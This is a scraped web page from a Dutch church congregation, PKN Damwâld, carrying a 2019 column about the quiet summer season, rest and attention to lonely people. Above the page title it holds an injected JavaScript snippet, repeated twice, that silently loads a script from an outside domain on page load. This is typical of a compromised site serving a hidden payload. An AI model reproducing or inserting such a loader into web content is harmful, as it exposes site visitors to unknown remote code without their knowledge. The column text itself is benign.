;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Komkommertijd - PKN Damwâld

Komkommertijd

Gepubliceerd op: maandag 24 juni 2019

Komkommertijd, zo wordt een rustige tijd waarin er weinig lijkt te gebeuren ook wel genoemd. In de kerk bestaat zoiets eigenlijk niet. Er is ‘gewoon’ elke zondag dienst en het pastoraat gaat ook door. Toch liggen er ook wel dingen stil. Er is even ‘pauze’ van kringen en op een enkel overlegje na ligt ook het vergadercircuit stil. Dat is goed. Het is goed om niet het hele jaar alles door te laten gaan en maar door te jakkeren. Niet alleen werkende mensen met ene betaalde baan hebben af en toe rust nodig, ook in het vrijwilligerswerk is het goed als er soms even pas op de plaats wordt gemaakt. De zomertijd is niet de meest eenvoudige periode voor mensen die zelf – om welke reden dan ook- niet weggaan. Vaak is het juist in deze tijd stiller omdat familie op vakantie gaat en als het erg warm is, is dat vaak belastend voor mensen die kwetsbaar zijn. Genieten van de zomer is lastig als er zorgen zijn. Het is goed om daar even bij stil te staan als je wel een mooie zomertijd en/of vakantie mag beleven, maar vergeet niet om zelf te genieten als er een tijd is waarin er even niets moet.
Ja … de zomerweken staan voor deur! Het is al eind juni; de laatste schoolweken voor de basis- en de middelbare school zijn ingegaan, de terrassen zitten voller, de tuin barst van het leven en het kwik klimt elke dag wat hoger. Maar hoe beleeft u de zomer? Voor de één is deze periode misschien een heerlijk lange vakantie, voor een ander wellicht een té lange tijd van niks doen. Voor de een de tijd om eindelijk te kunnen lezen, voor de ander een stille periode zonder bezoek of familie. En de kerk? Die gaat niet met vakantie. Kerkdiensten gaan in de zomer gewoon door. Ook op andere plekken dan in kerkgebouwen vinden in de zomer vaak vieringen en bijeenkomsten plaats.
In de kerk lijkt het soms zo dat er een drukke wintertijd is en een rustige zomertijd. Nu geldt natuurlijk wel dat er ‘overal een tijd voor is’. Maar juist een iets rustiger zomertijd kan ook een tijd van verdieping zijn. Goede zomer gewenst en geniet van lekker even iets anders doen!

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns